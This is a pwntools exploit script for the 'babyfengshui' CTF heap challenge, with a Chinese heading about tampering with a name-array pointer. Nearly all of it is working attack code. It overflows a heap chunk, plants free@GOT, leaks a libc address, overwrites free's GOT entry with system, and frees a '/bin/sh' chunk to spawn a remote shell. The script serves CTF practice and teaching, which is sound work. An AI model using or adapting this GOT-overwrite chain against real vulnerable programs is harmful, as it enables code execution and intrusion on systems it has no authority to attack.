收获:篡改中间name数组的地址来泄露和攻击
from pwn import *

# pwntools exploit script for the CTF challenge binary named below.
# The menu interaction order and the byte-exact payload are specific to
# that binary and libc build; nothing here is generic.
context.log_level = 'debug'  # echoes every byte sent/received to the console
# context.arch = 'amd64'
libc = ELF('./libc-2.23.so')
file = './babyfengshui_33c3_2016'
elf = ELF(file)
shellcode = asm(shellcraft.sh())  # built but never sent; left over from an earlier approach, presumably
local = 0  # 0 -> talk to the remote instance below, 1 -> spawn the binary locally
if local:
    io = process(file)
else:
    io = remote('node4.buuoj.cn',28340)


def debug() -> None:
    """Attach gdb to the running target (only meaningful when local=1)."""
    gdb.attach(io)


def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0) -> bytes:
    """Serialise the given fields into a 0xd8-byte, zero-padded buffer.

    Field names mirror glibc's 64-bit ``_IO_FILE`` layout (4-byte ``_flags``
    and ``_fileno``, 8-byte pointers, ``_lock`` at 0x88, ``_wide_data`` at
    0xa0, ``_mode`` at 0xc0).  This helper is defined but not called anywhere
    in this script; the exploit below is 32-bit (``p32``/``u32``).

    Returns:
        bytes of length 0xd8.
    """
    file_struct = p32(_flags) + \
        p32(0) + \
        p64(_IO_read_ptr) + \
        p64(_IO_read_end) + \
        p64(_IO_read_base) + \
        p64(_IO_write_base) + \
        p64(_IO_write_ptr) + \
        p64(_IO_write_end) + \
        p64(_IO_buf_base) + \
        p64(_IO_buf_end) + \
        p64(_IO_save_base) + \
        p64(_IO_backup_base) + \
        p64(_IO_save_end) + \
        p64(_IO_marker) + \
        p64(_IO_chain) + \
        p32(_fileno)
    # Pad to each fixed offset before appending the next field.
    file_struct = file_struct.ljust(0x88, b"\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, b"\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, b'\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, b"\x00")
    return file_struct


# Short aliases for the tube I/O primitives.
r = lambda : io.recv()
rx = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rud = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
li = lambda name,x : log.info(name+':'+hex(x))  # log a labelled hex value
shell = lambda : io.interactive()


# Menu wrappers.  Each one answers the exact prompt strings the binary prints;
# the numeric choice is the menu option ('0' add, '1' free, '2' show, '3' edit).
def add(description_size: int, name, text_size: int, text) -> None:
    """Menu option 0: create an entry with a description buffer, name and text."""
    ru('Action: ')
    sl('0')
    ru('size of description: ')
    sl(str(description_size))
    ru('name: ')
    sl(name)
    ru('text length: ')
    sl(str(text_size))
    ru('text: ')
    sl(text)


def show(idx: int) -> None:
    """Menu option 2: print entry ``idx``; the caller reads the output."""
    ru('Action: ')
    sl('2')
    ru('index: ')
    sl(str(idx))


def edit(idx: int, text_size: int, text) -> None:
    """Menu option 3: overwrite the text of entry ``idx``."""
    ru('Action: ')
    sl('3')
    ru('index: ')
    sl(str(idx))
    ru('text length: ')
    sl(str(text_size))
    ru('text: ')
    sl(text)


def free(idx: int) -> None:
    """Menu option 1: delete entry ``idx``."""
    ru('Action: ')
    sl('1')
    ru('index: ')
    sl(str(idx))


free_got = elf.got['free']  # GOT slot address of free() in the (non-PIE) target
add(0x80,'aaa',20,'a') #0
add(0x20,'aaa',20,'a') #1
add(0x40,'/bin/sh\x00',20,'/bin/sh\x00') #2
free(0)
# Layout of pay1 is binary-specific: 0x108 bytes of filler, then 4-byte fields
# ending in free@GOT.  The constants are tied to this build's heap layout.
pay1 = 0x108*b'a' + p32(0x100) + p32(0x29) + p32(0)*9 + p32(0x89) + p32(free_got)
add(0x108,'aaa',len(pay1),pay1) #3
show(1)
# Take the last 4 bytes up to and including the 0xf7 byte as the leaked
# pointer.  NOTE(review): '\xf7' is a str; on Python 3 this depends on
# pwntools encoding single-byte str delimiters as latin-1 -- b'\xf7' would
# be explicit.  The leak is assumed to be little-endian 32-bit, hence u32.
free_addr = u32(ru('\xf7')[-4:])
li('free_addr',free_addr)
# Rebase libc from the leaked free() address using the symbol offsets of the
# bundled libc-2.23.so; a different libc build would give wrong addresses.
libcbase = free_addr - libc.sym['free']
li('libcbase',libcbase)
system = libcbase + libc.sym['system']
li('system',system)
edit(1,len(p32(system)),p32(system))
free(2)
shell()
#debug()